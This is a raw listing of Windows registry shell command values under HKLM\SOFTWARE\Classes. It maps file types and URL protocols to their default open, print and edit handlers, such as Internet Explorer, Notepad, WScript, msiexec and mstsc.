HKEY_LOCAL_MACHINE\SOFTWARE\Classes\htmlfile\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\htmlfile\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\http\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\https\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\icmfile\shell\Install Profile\command (Default) REG_SZ "colorcpl.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.HTM\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.HTM\shell\opennew\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.HTM\shell\print\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.HTM\shell\printto\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.MHT\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.MHT\shell\opennew\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.PARTIAL\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.SVG\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.SVG\shell\opennew\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.SVG\shell\print\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.SVG\shell\printto\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.URL\Shell\Open\Command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.URL\Shell\print\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.URL\Shell\printto\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.WEBSITE\Shell\Open\Command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" -w "%l" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.XHT\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.XHT\shell\opennew\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.XHT\shell\print\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintXHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.AssocFile.XHT\shell\printto\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintXHTML "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.FTP\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.HTTP\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IE.HTTPS\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IMEDictionaryCompiler\shell\open\command (Default) REG_EXPAND_SZ "%WINDIR%\system32\IME\SHARED\imewdbld.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\imesxfile\shell\open\command (Default) REG_EXPAND_SZ "%WINDIR%\system32\IME\SHARED\imesearch.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\shell\Open\Command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\shell\print\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\shell\printto\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\jpegfile\shell\printto\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\shimgvw.dll",ImageView_PrintTo /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSEFile\Shell\Edit\Command (Default) REG_SZ C:\Windows\System32\Notepad.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSEFile\Shell\Open\Command (Default) REG_SZ C:\Windows\System32\WScript.exe "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSEFile\Shell\Open2\Command (Default) REG_SZ C:\Windows\System32\CScript.exe "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSEFile\Shell\Print\Command (Default) REG_SZ C:\Windows\System32\Notepad.exe /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSFile\Shell\Edit\Command (Default) REG_SZ C:\Windows\System32\Notepad.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSFile\Shell\Open\Command (Default) REG_SZ C:\Windows\System32\WScript.exe "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSFile\Shell\Open2\Command (Default) REG_SZ C:\Windows\System32\CScript.exe "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSFile\Shell\Print\Command (Default) REG_SZ C:\Windows\System32\Notepad.exe /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Launcher.Computer\Shell\Manage\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\CompMgmtLauncher.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\LDAP\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\LpkSetup.1\Shell\install\command (Default) REG_EXPAND_SZ %systemroot%\system32\lpksetup.exe /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MacromediaFlashPaper.MacromediaFlashPaper\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Internet Explorer\iexplore.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mhtmlfile\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mhtmlfile\shell\opennew\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellConsole.1\Shell\0\Command (Default) REG_SZ "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellConsole.1\Shell\Open\Command (Default) REG_SZ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellData.1\Shell\Open\Command (Default) REG_SZ "C:\Windows\System32\notepad.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellModule.1\Shell\Open\Command (Default) REG_SZ "C:\Windows\System32\notepad.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.PowerShellScript.1\Shell\Open\Command (Default) REG_SZ "C:\Windows\System32\notepad.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.ProvTool.Provisioning.1\Shell\open\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\provtool.exe" "%1" /source ShellOpen HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.System.Update.1\shell\open\command (Default) REG_EXPAND_SZ "%systemroot%\system32\wusa.exe" "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.Website\Shell\Open\Command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" -w "%l" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Microsoft.Workfolders\Shell\Open\command (Default) REG_SZ C:\Windows\System32\control.exe /name Microsoft.WorkFolders HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MMS\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-availablenetworks\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\system32\LaunchWinApp.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-mmsys\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\mmsys.cpl %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-msdt\shell\open\command (Default) REG_EXPAND_SZ "%SystemRoot%\system32\msdt.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-msime-imepad\shell\open\command (Default) REG_SZ C:\Windows\System32\IME\SHARED\IMEPADSV.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-msime-imjpdct\shell\open\command (Default) REG_SZ C:\Windows\System32\IME\IMEJP\IMJPDCT.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-perception-simulation\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\PerceptionSimulation\PerceptionSimulationInput.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-quick-assist\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\system32\quickassist.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-rdx-document\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\RDXService,OpenRDXDocument %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-settings-connectabledevices\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\system32\LaunchWinApp.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-settings-displays-topology\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\system32\LaunchWinApp.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-virtualtouchpad\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\system32\LaunchWinApp.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile\shell\Author\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe /a "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile\shell\RunAs\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSDASC\shell\open\command (Default) REG_EXPAND_SZ Rundll32.exe "%CommonProgramFiles%\System\OLE DB\oledb32.dll",OpenDSLFile %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Msi.Package\shell\Open\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\msiexec.exe" /i "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Msi.Package\shell\Repair\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\msiexec.exe" /f "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Msi.Package\shell\Uninstall\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\msiexec.exe" /x "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Msi.Patch\shell\Open\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\msiexec.exe" /p "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSInfoFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\msinfo32.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSSppLicenseFile\shell\open\command (Default) REG_SZ "iexplore.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSStorageSense\shell\open\command (Default) REG_EXPAND_SZ explorer ms-settings:storagesense HKEY_LOCAL_MACHINE\SOFTWARE\Classes\msstylesfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,Control_RunDLL %SystemRoot%\system32\desk.cpl desk,@Appearance /Action:OpenMSTheme /file:"%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\NetServer\shell\remotedesktop\command (Default) REG_SZ mstsc.exe -v %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaServer:1\shell\Open Media Player\command (Default) REG_EXPAND_SZ C:\Program Files\Windows Media Player\wmplayer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\odtfile\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\odtfile\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\odtfile\shell\printto\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\opensearchdescription\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\opensearchfilefolderresult\shell\open\command (Default) REG_SZ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\opensearchresult\shell\open\command (Default) REG_SZ HKEY_LOCAL_MACHINE\SOFTWARE\Classes\opensearchresult\shell\print\command (Default) REG_EXPAND_SZ rundll32.exe %windir%\system32\mshtml.dll,PrintHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\otffile\shell\preview\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\otffile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\P7RFile\shell\add\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtAddP7R %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\P7RFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenP7R %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\P7SFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Paint.Picture\shell\edit\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Paint.Picture\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pbkfile\Shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasphone.exe -f "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PBrush\shell\edit\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PBrush\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PBrush\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PerfFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe %systemroot%\system32\perfmon.msc /F "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pfmfile\shell\preview\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pfmfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PFXFile\shell\add\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtAddPFX %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PFXFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPFX %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PhotoViewer.FileAssoc.Tiff\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\piffile\shell\open\command (Default) REG_SZ "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pjpegfile\shell\printto\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\shimgvw.dll",ImageView_PrintTo /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pngfile\shell\printto\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\shimgvw.dll",ImageView_PrintTo /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\prffile\shell\Open\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\msrating.dll",ClickedOnPRF %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ratfile\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\msrating.dll",ClickedOnRAT %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\RDP.File\shell\Connect\command (Default) REG_SZ mstsc.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\RDP.File\shell\Edit\command (Default) REG_SZ mstsc.exe -edit "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\RDP.File\shell\Open\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mstsc.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regedit\shell\open\command (Default) REG_SZ regedit.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\notepad.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command (Default) REG_SZ regedit.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\notepad.exe /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\RemoteAssistance.1\Shell\open\command (Default) REG_EXPAND_SZ "%systemRoot%\system32\msra.exe" -openfile "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rlefile\shell\open\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rlefile\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rlefile\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rlogin\shell\open\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\url.dll",TelnetProtocolHandler %l HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rtffile\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rtffile\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rtffile\shell\printto\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SavedDsQuery\Shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\dsquery.dll,OpenSavedDsQuery %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\scrfile\shell\config\command (Default) REG_SZ "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\scrfile\shell\install\command (Default) REG_SZ rundll32.exe desk.cpl,InstallScreenSaver %l HKEY_LOCAL_MACHINE\SOFTWARE\Classes\scrfile\shell\open\command (Default) REG_SZ "%1" /S HKEY_LOCAL_MACHINE\SOFTWARE\Classes\scriptletfile\Shell\Generate Typelib\command (Default) REG_SZ "C:\Windows\System32\RUNDLL32.EXE" "C:\Windows\System32\scrobj.dll",GenerateTypeLib "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\scriptletfile\Shell\Open\command (Default) REG_SZ "C:\Windows\System32\NOTEPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\scriptletfile\Shell\Register\command (Default) REG_SZ "C:\Windows\System32\REGSVR32.EXE" /i:"%1" "C:\Windows\System32\scrobj.dll" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\scriptletfile\Shell\Unregister\command (Default) REG_SZ "C:\Windows\System32\REGSVR32.EXE" /u /n /i:"%1" "C:\Windows\System32\scrobj.dll" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\search\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L HKEY_LOCAL_MACHINE\SOFTWARE\Classes\search-ms\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SHCmdFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Shell.CDBurn\Shell\Prepare\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,PrepareDiscForBurnRunDll %L HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SPCFile\shell\add\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtAddSPC %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SPCFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\svgfile\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\svgfile\shell\opennew\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\svgfile\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\svgfile\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.3mf\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.avci\Shell\print\command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\shimgvw.dll,ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.avci\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.avcs\Shell\print\command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\shimgvw.dll,ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.avcs\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.avif\Shell\print\command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\shimgvw.dll,ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.avif\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.avifs\Shell\print\command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\shimgvw.dll,ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.avifs\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bmp\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.bmp\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.dib\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.fbx\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.gif\Shell\3D Edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe "%1" /ForceBootstrapPaint3D HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.gif\Shell\setdesktopwallpaper\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe 